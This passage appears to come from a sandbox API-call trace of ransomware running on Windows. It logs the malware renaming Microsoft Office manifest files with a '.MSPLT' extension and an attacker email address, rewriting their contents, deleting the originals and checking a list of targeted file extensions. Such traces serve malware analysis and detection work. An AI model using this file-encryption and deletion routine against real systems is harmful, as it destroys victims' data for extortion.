files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0175.903] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0175.903] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0175.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0175.903] GetLastError () returned 0x0 [0175.903] ReadFile (in: hFile=0x388, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x5e91c, lpOverlapped=0x0) returned 1 [0176.034] WriteFile (in: hFile=0x38c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x5e920, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x5e920, lpOverlapped=0x0) returned 1 [0176.045] ReadFile (in: hFile=0x388, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0176.045] WriteFile (in: hFile=0x38c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0176.045] SetEndOfFile (hFile=0x38c) returned 1 [0176.045] CloseHandle (hObject=0x38c) returned 1 [0176.053] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0176.053] SetEndOfFile (hFile=0x388) returned 1 [0176.057] CloseHandle (hObject=0x388) returned 1 [0176.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0176.058] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0000-1000-0000000ff1ce.xml")) returned 1 [0176.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.058] lstrlenW (lpString=".doc") returned 4 [0176.058] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0176.058] lstrlenW (lpString=".docx") returned 5 [0176.058] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0176.058] lstrlenW (lpString=".pdf") returned 4 [0176.058] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0176.058] lstrlenW (lpString=".xls") returned 4 [0176.058] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0176.058] lstrlenW (lpString=".xlsx") returned 5 [0176.058] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0176.058] lstrlenW (lpString=".ppt") returned 4 [0176.058] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0176.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.058] lstrlenW (lpString=".zip") returned 4 [0176.058] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0176.058] lstrlenW (lpString=".rar") returned 4 [0176.058] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0176.058] lstrlenW (lpString=".bz2") returned 4 [0176.058] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0176.058] lstrlenW (lpString=".7z") returned 3 [0176.482] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0176.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.483] lstrlenW (lpString=".dbf") returned 4 [0176.483] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0176.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.483] lstrlenW (lpString=".1cd") returned 4 [0176.483] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0176.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.483] lstrlenW (lpString=".jpg") returned 4 [0176.483] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0176.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.483] lstrlenW (lpString=".doc") returned 4 [0176.483] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0176.483] lstrlenW (lpString=".docx") returned 5 [0176.483] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0176.483] lstrlenW (lpString=".pdf") returned 4 [0176.483] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0176.483] lstrlenW (lpString=".xls") returned 4 [0176.483] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0176.483] lstrlenW (lpString=".xlsx") returned 5 [0176.483] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0176.483] lstrlenW (lpString=".ppt") returned 4 [0176.483] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0176.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.484] lstrlenW (lpString=".zip") returned 4 [0176.484] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0176.484] lstrlenW (lpString=".rar") returned 4 [0176.484] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0176.484] lstrlenW (lpString=".bz2") returned 4 [0176.484] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0176.484] lstrlenW (lpString=".7z") returned 3 [0176.484] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0176.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.484] lstrlenW (lpString=".dbf") returned 4 [0176.484] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0176.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.484] lstrlenW (lpString=".1cd") returned 4 [0176.484] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0176.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml") returned 104 [0176.484] lstrlenW (lpString=".jpg") returned 4 [0176.484] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0176.484] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0176.484] lstrlenW (lpString="AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 53 [0176.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0176.490] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=1261) returned 1 [0176.490] CloseHandle (hObject=0x2f4) returned 1 [0176.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml")) returned 0x220 [0176.491] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0176.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0176.491] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0176.491] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0176.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0176.493] GetLastError () returned 0x0 [0176.493] ReadFile (in: hFile=0x2f4, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x4ed, lpOverlapped=0x0) returned 1 [0176.495] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x4f0, lpOverlapped=0x0) returned 1 [0176.498] ReadFile (in: hFile=0x2f4, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0176.498] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0176.498] SetEndOfFile (hFile=0x37c) returned 1 [0176.498] CloseHandle (hObject=0x37c) returned 1 [0176.500] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0176.500] SetEndOfFile (hFile=0x2f4) returned 1 [0176.501] CloseHandle (hObject=0x2f4) returned 1 [0176.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0176.502] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml")) returned 1 [0176.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.502] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.502] lstrlenW (lpString=".doc") returned 4 [0176.502] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0176.502] lstrlenW (lpString=".docx") returned 5 [0176.502] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0176.502] lstrlenW (lpString=".pdf") returned 4 [0176.502] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0176.502] lstrlenW (lpString=".xls") returned 4 [0176.502] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0176.502] lstrlenW (lpString=".xlsx") returned 5 [0176.502] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0176.503] lstrlenW (lpString=".ppt") returned 4 [0176.503] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0176.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.503] lstrlenW (lpString=".zip") returned 4 [0176.503] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0176.503] lstrlenW (lpString=".rar") returned 4 [0176.503] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0176.503] lstrlenW (lpString=".bz2") returned 4 [0176.503] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0176.503] lstrlenW (lpString=".7z") returned 3 [0176.503] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0176.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.503] lstrlenW (lpString=".dbf") returned 4 [0176.503] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0176.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.503] lstrlenW (lpString=".1cd") returned 4 [0176.503] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0176.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.503] lstrlenW (lpString=".jpg") returned 4 [0176.503] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0176.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.503] lstrlenW (lpString=".doc") returned 4 [0176.503] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0176.504] lstrlenW (lpString=".docx") returned 5 [0176.504] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0176.504] lstrlenW (lpString=".pdf") returned 4 [0176.504] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0176.504] lstrlenW (lpString=".xls") returned 4 [0176.504] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0176.504] lstrlenW (lpString=".xlsx") returned 5 [0176.504] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0176.504] lstrlenW (lpString=".ppt") returned 4 [0176.504] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0176.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.504] lstrlenW (lpString=".zip") returned 4 [0176.504] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0176.504] lstrlenW (lpString=".rar") returned 4 [0176.504] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0176.504] lstrlenW (lpString=".bz2") returned 4 [0176.504] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0176.504] lstrlenW (lpString=".7z") returned 3 [0176.504] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0176.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.504] lstrlenW (lpString=".dbf") returned 4 [0176.504] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0176.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.504] lstrlenW (lpString=".1cd") returned 4 [0176.504] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0176.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 104 [0176.504] lstrlenW (lpString=".jpg") returned 4 [0176.504] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0176.505] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0176.505] lstrlenW (lpString="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 53 [0176.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0176.506] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x25eff14 | out: lpFileSize=0x25eff14*=253712) returned 1 [0176.506] CloseHandle (hObject=0x2f4) returned 1 [0176.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml")) returned 0x220 [0176.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0176.506] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0176.506] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0176.506] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0176.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0176.508] GetLastError () returned 0x0 [0176.509] ReadFile (in: hFile=0x2f4, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x3df10, lpOverlapped=0x0) returned 1 [0176.518] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x3df20, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x3df20, lpOverlapped=0x0) returned 1 [0176.525] ReadFile (in: hFile=0x2f4, lpBuffer=0x3927020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x25efecc, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesRead=0x25efecc*=0x0, lpOverlapped=0x0) returned 1 [0176.525] WriteFile (in: hFile=0x37c, lpBuffer=0x3927020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x25efc94, lpOverlapped=0x0 | out: lpBuffer=0x3927020*, lpNumberOfBytesWritten=0x25efc94*=0x13e, lpOverlapped=0x0) returned 1 [0176.525] SetEndOfFile (hFile=0x37c) returned 1 [0176.525] CloseHandle (hObject=0x37c) returned 1 [0176.824] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x25efec0 | out: lpNewFilePointer=0x0) returned 1 [0176.824] SetEndOfFile (hFile=0x2f4) returned 1 [0176.828] CloseHandle (hObject=0x2f4) returned 1 [0176.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0177.082] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml")) returned 1 [0177.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.083] lstrlenW (lpString=".doc") returned 4 [0177.083] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.083] lstrlenW (lpString=".docx") returned 5 [0177.083] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.083] lstrlenW (lpString=".pdf") returned 4 [0177.083] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.083] lstrlenW (lpString=".xls") returned 4 [0177.083] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.083] lstrlenW (lpString=".xlsx") returned 5 [0177.083] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.083] lstrlenW (lpString=".ppt") returned 4 [0177.083] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.083] lstrlenW (lpString=".zip") returned 4 [0177.083] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.083] lstrlenW (lpString=".rar") returned 4 [0177.083] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.083] lstrlenW (lpString=".bz2") returned 4 [0177.083] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.083] lstrlenW (lpString=".7z") returned 3 [0177.083] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.083] lstrlenW (lpString=".dbf") returned 4 [0177.083] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.083] lstrlenW (lpString=".1cd") returned 4 [0177.083] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.084] lstrlenW (lpString=".jpg") returned 4 [0177.084] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.084] lstrlenW (lpString=".doc") returned 4 [0177.084] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0177.084] lstrlenW (lpString=".docx") returned 5 [0177.084] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0177.084] lstrlenW (lpString=".pdf") returned 4 [0177.084] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0177.084] lstrlenW (lpString=".xls") returned 4 [0177.084] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0177.084] lstrlenW (lpString=".xlsx") returned 5 [0177.084] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0177.084] lstrlenW (lpString=".ppt") returned 4 [0177.084] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0177.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.084] lstrlenW (lpString=".zip") returned 4 [0177.084] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0177.084] lstrlenW (lpString=".rar") returned 4 [0177.084] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0177.084] lstrlenW (lpString=".bz2") returned 4 [0177.084] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0177.084] lstrlenW (lpString=".7z") returned 3 [0177.084] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0177.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.084] lstrlenW (lpString=".dbf") returned 4 [0177.084] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0177.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.084] lstrlenW (lpString=".1cd") returned 4 [0177.084] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0177.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 104 [0177.084] lstrlenW (lpString=".jpg") returned 4 [0177.084] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0177.085] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0177.085] lstrlenW (lpString="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 53 [0177.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 